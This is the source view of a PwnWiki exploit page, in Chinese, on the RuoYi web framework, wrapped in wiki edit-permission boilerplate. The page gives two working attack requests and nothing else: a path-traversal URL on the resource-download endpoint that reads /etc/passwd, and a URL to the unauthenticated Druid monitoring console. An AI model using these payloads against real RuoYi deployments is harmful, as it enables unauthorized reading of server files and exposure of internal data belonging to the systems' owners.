View source for 若依任意文件讀取&未授權訪問漏洞

From PwnWiki

← 若依任意文件讀取&未授權訪問漏洞

You do not have permission to edit this page, for the following reasons:

The action you have requested is limited to users in the group: Users.
You must confirm your email address before editing pages. Please set and validate your email address through your user preferences.

You can view and copy the source of this page.

==任意文件讀取==
<pre>
https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd
</pre>

==未授權訪問==
<pre>
http://xxx.xxx.xxx.xxx/prod-api/druid/index.html
</pre>

Return to 若依任意文件讀取&未授權訪問漏洞.

Retrieved from "https://pwnwiki.com/index.php?title=若依_任意文件讀取%26未授權訪問漏洞"